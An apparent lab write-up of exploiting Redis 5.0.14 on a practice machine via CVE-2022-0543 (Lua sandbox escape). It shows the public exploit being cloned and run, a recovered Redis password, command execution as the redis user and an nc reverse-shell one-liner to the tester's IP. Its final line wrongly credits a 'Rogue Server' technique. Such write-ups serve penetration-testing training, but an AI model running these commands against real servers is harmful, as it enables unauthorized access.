InfoSec LAB

Readys_Exploitation_2

Created: 3 min read

Lua Sandbox Escape

The target Redis instance runs the version 5.0.14. Testing it for Lua Sandbox Escape; CVE-2022-0543

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ git clone https://github.com/0x7eTeam/CVE-2022-0543 ; cd CVE-2022-0543                          
Cloning into 'CVE-2022-0543'...
remote: Enumerating objects: 19, done.
remote: Counting objects: 100% (19/19), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 19 (delta 4), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (19/19), 69.74 KiB | 2.40 MiB/s, done.
Resolving deltas: 100% (4/4), done.

Downloading the repo to Kali

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys/CVE-2022-0543]
└─$ python3 CVE-2022-0543.py -i $IP       
/home/kali/PEN-200/PG_PRACTICE/readys/CVE-2022-0543/CVE-2022-0543.py:5: SyntaxWarning: invalid escape sequence '\ '
  version = """
  
      [#] Create By ::
        _                     _    ___   __   ____                             
       / \   _ __   __ _  ___| |  / _ \ / _| |  _ \  ___ _ __ ___   ___  _ __  
      / _ \ | '_ \ / _` |/ _ \ | | | | | |_  | | | |/ _ \ '_ ` _ \ / _ \| '_ \ 
     / ___ \| | | | (_| |  __/ | | |_| |  _| | |_| |  __/ | | | | | (_) | | | |
    /_/   \_\_| |_|\__, |\___|_|  \___/|_|   |____/ \___|_| |_| |_|\___/|_| |_|
                   |___/            By https://aodsec.com                                           
    
Please input redis ip:
>>192.168.154.166
Please input redis port:
>>6379
Auth:
>>Ready4Redis?
input exec cmd:(q->exit)
>>id
b'uid=107(redis) gid=114(redis) groups=114(redis)\n'

Code execution confirmed

>>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.218 9999 >/tmp/f

Sending a reverse shell

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.154.166] 41058
bash: cannot set terminal process group (1277): Inappropriate ioctl for device
bash: no job control in this shell
redis@readys:/var/spool/cron$ whoami
whoami
redis
redis@readys:/var/spool/cron$ hostname
hostname
readys
redis@readys:/var/spool/cron$ ifconfig
ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.154.166  netmask 255.255.255.0  broadcast 192.168.154.255
        inet6 fe80::250:56ff:fe9e:d748  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:9e:d7:48  txqueuelen 1000  (Ethernet)
        RX packets 2231876  bytes 247702863 (236.2 MiB)
        RX errors 0  dropped 355  overruns 0  frame 0
        TX packets 1479640  bytes 259301307 (247.2 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2410  bytes 238538 (232.9 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2410  bytes 238538 (232.9 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial Foothold established to the target system as the redis account via the Redis Rogue Server technique

Interactive Graph View

Backlinks